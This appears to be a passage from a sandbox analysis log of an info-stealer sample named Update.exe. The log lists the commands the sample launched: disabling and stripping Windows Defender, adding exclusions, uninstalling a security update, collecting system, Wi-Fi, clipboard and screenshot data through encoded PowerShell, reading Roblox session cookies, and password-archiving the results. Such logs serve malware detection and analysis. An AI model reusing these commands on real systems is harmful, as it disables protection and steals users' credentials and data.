                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI68522\rar.exe a -r -hp"dextycraxscloud" "C:\Users\user\AppData\Local\Temp\dRGk3.zip" *"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Update.exe'Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Users\user\AppData\Local\Temp\Build.exe "C:\Users\user\AppData\Local\Temp\Build.exe"
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exe "C:\Users\user\AppData\Local\Temp\lf6o4T3T.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.cmdline"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8576.tmp" "c:\Users\user\AppData\Local\Temp\yidhhzbx\CSCA27ED749AA364CCD94BFD566BA81531.TMP"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeProcess created: C:\Windows\explorer.exe explorer.exe
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
                    Source: C:\Users\user\Desktop\Update.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaaga